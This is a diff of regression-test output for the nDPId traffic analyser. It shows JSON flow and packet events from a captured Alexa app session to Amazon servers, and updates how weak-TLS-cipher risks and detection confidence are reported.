-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":486,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044502,"flow_last_seen":1490976044687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":489,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044488,"flow_last_seen":1490976044687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":491,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044521,"flow_last_seen":1490976044687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":495,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044509,"flow_last_seen":1490976044687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
-00879{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2075,"flow_avg_l4_payload_len":230,"midstream":0,"ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01249{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":513,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4995,"flow_avg_l4_payload_len":454,"midstream":0,"ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}}
+01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":486,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044502,"flow_last_seen":1490976044687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":489,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044488,"flow_last_seen":1490976044687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":491,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044521,"flow_last_seen":1490976044687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":495,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044509,"flow_last_seen":1490976044687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+00905{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2075,"flow_avg_l4_payload_len":230,"midstream":0,"ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01275{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":513,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4995,"flow_avg_l4_payload_len":454,"midstream":0,"ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976046418,"flow_last_seen":1490976046418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976046418,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1490976046418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976046418,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8dehAAEAG0QasECrYNF7ohrJwAbub2CWZAAAAAKAC\/\/+NLQAAAgQFtAQCCAoA9lBxAAAAAAEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1490976046475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976046475,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWCFAAOcGR9k0XuiGrBAq2AG7snCFN7lwm9glmnASH\/679wAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1490976046478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976046478,"pkt":"AMDKkaPvePiC0\/vCCABFAAAodelAAEAG0RmsECrYNF7ohrJwAbub2CWahTe5cVAQAVcGaQAA"}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976046418,"flow_last_seen":1490976046478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976046478,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":605,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976046418,"flow_last_seen":1490976046847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1490976046847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976046418,"flow_last_seen":1490976046478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976046478,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":605,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976046418,"flow_last_seen":1490976046847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1490976046847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047014,"flow_last_seen":1490976047014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976047014,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1490976047014,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976047014,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JC1AAEAG7\/2sECrYNu8YuoTxAbsotHSAAAAAAKAC\/\/+r6QAAAgQFtAQCCAoA9lCtAAAAAAEDAwg="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047050,"flow_last_seen":1490976047050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976047050,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1490976047050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976047050,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8zEVAAEAGR+WsECrYNu8YuoTyAbvILJz0AAAAAKAC\/\/\/j9wAAAgQFtAQCCAoA9lCxAAAAAAEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1490976047071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976047071,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwYANAAOcGDTM27xi6rBAq2AG7hPHQ2dGWKLR0gXASH\/53JwAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1490976047073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976047073,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJC5AAEAG8BCsECrYNu8YuoTxAbsotHSB0NnRl1AQAVfBmAAA"}
-00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047014,"flow_last_seen":1490976047075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976047075,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047014,"flow_last_seen":1490976047075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976047075,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047096,"flow_last_seen":1490976047096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976047096,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1490976047096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976047096,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Q4ZAAEAGA2msECrYNF7ohrJzAbuRhBMzAAAAAKAC\/\/+poAAAAgQFtAQCCAoA9lC1AAAAAAEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1490976047107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976047107,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwYitAAOcGCws27xi6rBAq2AG7hPIGkxHQyCyc9XASH\/45RwAAAgQFtAEDAwY="}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1490976047109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976047109,"pkt":"AMDKkaPvePiC0\/vCCABFAAAozEZAAEAGR\/isECrYNu8YuoTyAbvILJz1BpMR0VAQAVeDuAAA"}
-00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047050,"flow_last_seen":1490976047111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976047111,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047014,"flow_last_seen":1490976047133,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976047133,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
